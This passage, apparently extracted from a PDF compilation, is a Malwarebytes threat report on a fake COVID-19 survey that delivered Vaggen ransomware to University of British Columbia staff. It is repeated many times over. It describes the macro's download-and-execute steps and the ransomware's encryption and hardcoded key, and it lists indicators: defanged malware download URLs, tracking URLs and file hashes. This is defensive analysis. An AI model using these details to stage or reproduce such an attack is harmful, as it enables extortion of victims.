3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1827 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1828 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1829 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1830 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1831 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1832 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1833 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1834 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1835 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1836 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1837 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1838 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1839 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1840 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1841 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1842 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1843 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1844 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1845 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1846 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1847 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1848 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1849 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1850 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1851 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1852 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1853 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1854 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1855 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1856 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1857 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1858 of 